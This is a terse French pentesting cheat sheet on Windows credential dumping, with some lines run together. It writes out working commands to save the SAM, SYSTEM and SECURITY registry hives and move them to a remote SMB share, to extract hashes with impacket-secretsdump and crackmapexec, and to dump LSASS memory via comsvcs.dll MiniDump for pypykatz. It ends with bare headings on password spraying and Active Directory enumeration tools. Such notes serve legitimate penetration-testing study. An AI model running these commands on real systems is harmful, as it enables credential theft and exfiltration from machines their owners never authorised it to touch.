Enumération
SAM
hklm\sam
hklm\system
hklm\security
reg.exe save hklm\sam C:\sam.save
move sam.save \\10.10.15.16\CompData
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCALcrackmapexec smb <machine_ip> --local-auth -u user -p pass --sam
crackmapexec smb <machine_ip> --local-auth -u user -p pass --lsaLSASS
# Recherche du PID
tasklist /svc
Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
pypykatz lsa minidump /home/peter/Documents/lsass.dmp NTDS.dit
Recherche de credentials
Username
Informations
Kerbrute
Politique de mot de passe
Liste de nom d'utilisateurs
Pulvérisation de mot de passe
Linux
Windows
Module PowerShell ActiveDirectory
Powerview
SharpView
SharpHound / BloodHound
Mis à jour